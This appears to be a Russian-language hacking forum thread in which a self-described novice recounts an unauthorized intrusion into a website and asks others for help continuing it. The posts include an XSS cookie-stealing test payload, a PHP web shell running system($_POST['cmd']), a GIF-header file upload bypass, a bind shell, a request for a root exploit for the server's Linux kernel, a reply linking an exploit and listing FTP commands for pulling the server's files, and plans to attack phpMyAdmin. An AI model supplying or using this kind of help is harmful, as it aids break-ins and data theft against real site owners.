Ребят несколько дней назад через ОпенХ 2.8 уязвимость вошел в админ аккаунт, потом залил шелл. Просидел мой шелл там около 4 дней. )))) Но на 5 день у меня и шелл пропал, и ОпенХ тоже нету и пароль к админ панелью Апача тоже вообщем меня конкретно устранили. Но я не успокоилья, нашел ХСС на сайте. Дело такое, есть поле для ввода всяких мыслей и вырожений, типа "чего я буду делать завтра": - ОТВЕТ: Вас поламаю...))))))) ну и так дали. В поле ввода набрал PHP: <script>alert(document.cookie)</script> и обламался, потом решил нажать на "Редактировать" ну давай по редоктируем, и опять же набрал тоже самое..и удача, вижу свои кукиси. Сделал рефреш, облом, в место выполнения скрипта показывает текст, опять редактировал, нажал сохранить, и опять скрипт задействовал. Дальше набрал PHP: <html> <form method="post"> <input type="text" name="cmd"> <input type="submit" value="CMD"> </form> <?php echo"<pre>"; @system($_POST['cmd']); echo"</pre>"; ?> </html> Ну после редактирования у меня есть поле для загрузки файла, но.. тут то и дело что ничего и не получилось, опять же как после перезагрузки страници вижу только код (((( ну что поделать дальше? Ну сильно не пинайте, я еще не вольшебник, я только учусь )))))))))))))))))))))))))))))))))))))
Простым способом редактирования шелла залил шелл на сервер, но там сервер файл автоматически переименовывает и дает разшерение JPG. в шелле на первой строке пишу только GIF и сервер глотает его как гифку, а дальше не могу его запустить, потому что имя файла уже типа f_1_4125_13097_20.jpg. Открываю его, показывает отсуствие картинки. Ч то делать, как его запустить дальше?
Так парни, я зашел через бинд шел конектился к порту 9999 но вот правал, у меня права www. uname -a выдал Linux www2.site.com 2.6.18-164.6.1.el5 #1 SMP Tue Oct 27 11:30:06 EDT 2009 i686 i6 86 i386 GNU/Linux пока експлоит на поднятие прав не могу найти, может есть у кого то? смотрел на http://inj3ct0r.com/ ранный milw0rm но там не могу найти что надо. Поделитесь советом. Мне нужен рут на этом серваке. Вот еще что, могу ли я через командную страку все что есть на серваке перекинуть мне на фтп?
Может этот поможет - http://www.exploit-db.com/exploits/10613/ ftp> help - говорит само за себя ftp> quit - завершить работу ftp> bin - установить режим пересылки бинарных файлов (настоятельно рекомендую) ftp> cd katalog - перемещаться по "тамошним" каталогам ftp> ls - выдать "тамошнее" оглавление ftp> lcd katalog - перемещаться по "здешним" каталогам ftp> !dir - выдать "здешнее" оглавление ftp> !ls -al - выдать "здешнее" оглавление ftp> get file-tam [ file-name-zdes ] - взять файл оттуда ftp> put file-zdes [ file-name-tam ] - положить файл туда Подробней тут - Ссылка
нет, пробовал, выдовал ошибку mmap() типа не вхатает привилегии или че то в этом роде. Мой шелл закрилы, все базы експлоитов пробовал, ничего не помогло. Может я думаю он уже пропатченный? Вот ешил пробовать в эксплоите 10613 в место mmap пробовать mnumap или map, но уже было поздно. У меня больше нету шелла. ОпенХ тоже закрыли, доадались. шас я к ним еще постучусь, нашел phpmyadmin а внем /scripts/setup.php ну пока что не разобрался как залить шелл туда, но думаю с ващей помощью получиться Вот так вот это уже стало дело принципа
